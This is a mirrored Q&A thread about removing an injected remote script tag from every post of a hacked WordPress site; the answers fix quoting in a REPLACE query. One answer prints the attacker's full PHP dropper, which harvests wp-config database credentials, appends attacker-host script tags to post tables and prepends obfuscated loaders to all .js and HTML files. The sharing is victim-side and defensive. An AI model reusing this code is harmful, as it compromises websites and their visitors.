My WordPress site has been hacked and every post has had
<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>
added to the end of each post which I need to remove. I have 375 posts I need this removing from I have tried
UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="https://i.imgur.com/picture.jpg" alt="" /></p>', '');
from the How to mass delete one line from all posts
and substituted it with the following query I’m thinking it has something to do with the ‘ in the query
UPDATE wp_posts SET post_content = REPLACE (post_content, '<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>', '');
but I get the following error
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>'' at line 1
when I run the query I think it has something to do with the ' inside the script tags but I don’t know how to remove them.
Answers:
Thank you for visiting the Q&A section on Magenaut. Please note that all the answers may not help you solve the issue immediately. So please treat them as advisements. If you found the post helpful (or not), leave a comment & I’ll get back to you as soon as possible.
Method 1
Try this:
UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>","");
Method 2
Your original code had single quotes inside a single quote. Which is why @uprompt ‘s code worked. …. he uses a double quote to surround the text to search for in the command.
Method 3
I was hacked with the same script, just the URL is different.
<script src="https://drake.strongcapitalads.ga/m.js?n=ns1" type="text/javascript2></script>
Seems this group has various server under their control. I already sent out abuse emails.
Don’t forget that the malware was also added to all your *.js files and other files. Here is the malicious script that was uploaded to my server making those chances to the posts and other files:
<?php echo "ssqqss>>>";
error_reporting(0);
ini_set('display_errors',0);
ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
$count = 0;
search_file_js($_SERVER['DOCUMENT_ROOT']."/../../../../../../../../",".js");
echo "rn
jssss count:: ". $count;
echo "<<<<ssqqss";
function get_var_reg($pat,$text) {
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
function search_file_ms($dir,$file_to_search){
$search_array = array();
$files = scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file_ms( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file_ms( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
@search_file_ms($path, $file_to_search);
}
}
}
function show_sitenames($file){
$content = @file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {
$db = get_var_reg("'DB_NAME'.*?,.*?['|"](.*?)['|"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|"](.*?)['|"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|"](.*?)['|"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|"](.*?)['|"]",$content);
// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {
} else {
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "drake.strongcapitalads.ga") === false){
if(strpos($val, "drake.strongcapitalads.ga") === false){
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,"<script src='https://drake.strongcapitalads.ga/m.js?n=ns1' type='text/javascript'></script>") WHERE post_content NOT LIKE '%drake.strongcapitalads.ga%'";
$conn->query($q3);
echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
} else {
}
}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function search_file($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it($path);
} }else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
function search_file_index($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
search_file_index( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
search_file_index( $dir,$file_to_search);
return;
}
}
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {
make_it_index($path);
} }else if($value != "." && $value != "..") {
search_file_index($path, $file_to_search);
}
}
}
function search_file_js($dir,$file_to_search){
$files = @scandir($dir);
if($files == false) {
$dir = substr($dir, 0, -3);
if (strpos($dir, '../') !== false) {
@search_file_js( $dir,$file_to_search);
return;
}
if($dir == $_SERVER['DOCUMENT_ROOT']."/") {
@search_file_js( $dir,$file_to_search);
return;
}
} else {
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
global $count;
$count++;
make_it_js($path);
} }else if($value != "." && $value != "..") {
search_file_js($path, $file_to_search);
}
}
}
}
function make_it_js($f){
$g = file_get_contents($f);
if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {
} else {
$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
}
}
function make_it_index($f){
$g = file_get_contents($f);
if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false || strpos($g, 'drake.strongcapitalads.ga') !== false) {
} else {
$l2 = "<script type='text/javascript' src='https://drake.strongcapitalads.ga/m.js?n=nb5'></script>";
$g = file_get_contents($f);
$g = $l2.$g;
@system('chmod 777 '.$f);
@file_put_contents($f,$g);
echo "in:".$f."rn";
}
}
function make_it($f){
$g = file_get_contents($f);
if (strpos($g, '100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97') !== false) {
} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, '<head>') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}
if (strpos($g, '</head>') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system('chmod 777 '.$f);
@file_put_contents($f,$b);
echo "hh:".$f."rn";
}
}
}
All methods was sourced from stackoverflow.com or stackexchange.com, is licensed under cc by-sa 2.5, cc by-sa 3.0 and cc by-sa 4.0